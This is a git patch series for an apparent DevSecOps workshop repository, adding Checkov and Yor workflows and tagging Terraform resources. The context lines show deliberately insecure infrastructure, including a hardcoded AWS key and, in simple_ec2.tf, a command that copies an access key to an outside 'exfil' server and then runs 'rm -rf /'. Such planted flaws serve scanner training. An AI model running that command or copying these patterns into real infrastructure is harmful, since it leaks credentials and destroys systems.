From 58d473b443a1eaf9a34aedb445101d69a1add658 Mon Sep 17 00:00:00 2001 From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com> Date: Wed, 12 Mar 2025 12:09:38 -0400 Subject: [PATCH 1/5] Create checkov.yaml --- .github/workflows/checkov.yaml | 35 ++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 .github/workflows/checkov.yaml diff --git a/.github/workflows/checkov.yaml b/.github/workflows/checkov.yaml new file mode 100644 index 000000000..9f7240507 --- /dev/null +++ b/.github/workflows/checkov.yaml @@ -0,0 +1,35 @@ +name: checkov +on: + pull_request: + push: + branches: + - main +jobs: + scan: + runs-on: ubuntu-latest + permissions: + contents: read # for actions/checkout to fetch code + security-events: write # for GitHub/codeql-action/upload-sarif to upload SARIF results + + steps: + - uses: actions/checkout@v2 + + - name: Run checkov + id: checkov + uses: bridgecrewio/checkov-action@master + with: + directory: code/ + #soft_fail: true + #api-key: ${{ secrets.BC_API_KEY }} + #env: + #PRISMA_API_URL: https://api4.prismacloud.io + + - name: Upload SARIF file + uses: GitHub/codeql-action/upload-sarif@v2 + + # Results are generated only on a success or failure + # this is required since GitHub by default won't run the next step + # when the previous one has failed. Alternatively, enable soft_fail in checkov action. + if: success() || failure() + with: + sarif_file: results.sarif From 313480c4ea9ce87336acdeac3807d0d08c454a92 Mon Sep 17 00:00:00 2001 From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com> Date: Wed, 12 Mar 2025 12:13:04 -0400 Subject: [PATCH 2/5] Create yor.yaml --- .github/workflows/yor.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 .github/workflows/yor.yaml diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml new file mode 100644 index 000000000..a16506910 --- /dev/null +++ b/.github/workflows/yor.yaml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main From f7c69a0c7c47c958707e28bc59060a42f7db1cb6 Mon Sep 17 00:00:00 2001 From: "github-actions[bot]" <41898282+github-actions[bot]@users.noreply.github.com> Date: Wed, 12 Mar 2025 16:13:26 +0000 Subject: [PATCH 3/5] Update tags (by Yor) --- code/deployment_ec2.tf | 150 ++++++++++++++++++++++++++++++++++++++--- code/deployment_s3.tf | 76 +++++++++++++++++++-- code/simple_ec2.tf | 11 +++ code/simple_s3.tf | 11 ++- 4 files changed, 233 insertions(+), 15 deletions(-) diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf index 7e3d2bba2..cf68fecde 100644 --- a/code/deployment_ec2.tf +++ b/code/deployment_ec2.tf @@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host" + yor_trace = "13ef843f-00de-4552-bb63-826236822e2d" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_host_storage" + yor_trace = "7051d875-9e7c-450b-bf99-51be80352ed8" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "example_snapshot" + yor_trace = "39d87c2c-74c1-49aa-8c3d-9fe3a4cc69a4" + } } resource "aws_volume_attachment" "ebs_att" { @@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-node" + yor_trace = "7efd7cf8-ce2f-4dce-ac95-a9de7a0f1d1f" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_vpc" + yor_trace = "66e659a2-04df-4373-b434-c6bdbf7d12b8" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet" + yor_trace = "8437183a-ec4d-4162-ac0f-e13bf8dcc679" + } } resource "aws_subnet" "web_subnet2" { @@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_subnet2" + yor_trace = "edc1ae57-90e4-444b-b536-9eeb09e252bf" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_igw" + yor_trace = "1b1fad7c-2d09-4997-a7b0-fd868ae22bba" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web_rtb" + yor_trace = "2e00c9cc-64a9-4298-8337-a2fa10b73e7a" + } } resource "aws_route_table_association" "rtbassoc" { @@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "web-eni" + yor_trace = "b7117ddd-66fe-45c9-8580-1d302cabb2b3" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "vpcflowlogs" + yor_trace = "b8c6c95b-b70a-4be0-b766-d1a9eefb0037" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "flowbucket" + yor_trace = "baf7a387-0aa5-48d0-80cd-a477081ba407" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..b594872ce 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf @@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data" + yor_trace = "e1850928-c651-4191-b6a9-ec49e1f7fb06" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_object" + yor_trace = "d6b52295-bc27-4602-a169-0117b3c26f85" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "financials" + yor_trace = "b9d4aeee-9d0b-4269-a907-a43d2f1cc059" + } } resource "aws_s3_bucket" "operations" { @@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "operations" + yor_trace = "f799015f-f3a8-43f5-8927-9362a02b1670" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "data_science" + yor_trace = "499ec48c-8360-4c18-a960-9744be19b221" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "logs" + yor_trace = "c52224d3-11d7-4268-895a-942e3f1d188e" + } } diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..f89e11b17 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf @@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "test" + yor_trace = "99e2c099-abb6-4d53-acad-97c6f00b271d" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..dec364820 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf @@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "RajithSangireddy" + git_repo = "prisma-cloud-devsecops-workshop" + yor_name = "dev_s3" + yor_trace = "624c8def-dc33-4f46-ab6a-53f121877049" } } From 45ede349bb7b20ad338ac69a013979d9fd8bac5b Mon Sep 17 00:00:00 2001 From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com> Date: Wed, 12 Mar 2025 12:26:37 -0400 Subject: [PATCH 4/5] Delete .github/workflows/yor.yaml --- .github/workflows/yor.yaml | 19 ------------------- 1 file changed, 19 deletions(-) delete mode 100644 .github/workflows/yor.yaml diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml deleted file mode 100644 index a16506910..000000000 --- a/.github/workflows/yor.yaml +++ /dev/null @@ -1,19 +0,0 @@ -name: IaC tag and trace - -on: - push: - pull_request: - -jobs: - yor: - runs-on: ubuntu-latest - permissions: - contents: write - - steps: - - uses: actions/checkout@v2 - name: Checkout repo - with: - fetch-depth: 0 - - name: Run yor action - uses: bridgecrewio/yor-action@main From 5e4b8817047f341dae8553aa2f3dc9d8ad351fe0 Mon Sep 17 00:00:00 2001 From: whitewalker <42011633+RajithSangireddy@users.noreply.github.com> Date: Wed, 12 Mar 2025 12:28:26 -0400 Subject: [PATCH 5/5] Create yor.yaml --- .github/workflows/yor.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 .github/workflows/yor.yaml diff --git a/.github/workflows/yor.yaml b/.github/workflows/yor.yaml new file mode 100644 index 000000000..a16506910 --- /dev/null +++ b/.github/workflows/yor.yaml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main